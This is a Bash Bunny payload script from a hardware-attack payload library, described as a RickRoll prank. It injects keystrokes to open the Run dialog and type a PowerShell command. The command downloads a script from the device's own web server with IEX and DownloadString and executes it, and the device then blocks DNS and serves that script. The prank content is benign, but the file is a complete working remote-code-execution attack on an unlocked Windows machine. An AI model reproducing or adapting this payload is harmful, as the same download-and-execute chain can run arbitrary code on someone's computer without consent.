bashbunny-payloads/payloads/library/prank/RickRoll/payload.txt

#!/bin/bash
#
# Title:         RickRoll Prank
# Author:        illwill
# Version:       0.1
#
#
# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started starting the rickroll
# Green..............RickRoll Started, Safe to pull


LED SETUP
GET SWITCH_POSITION

LED STAGE1
ATTACKMODE HID
Q GUI r
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
Q DELAY 300
Q ENTER

LED STAGE2
ATTACKMODE RNDIS_ETHERNET
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
cd $payload_dir
LED ATTACK
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
pid=$!
while ! nc -z localhost 80; do sleep 0.2; done
sleep 3

LED FINISH
kill -9 $pid
exit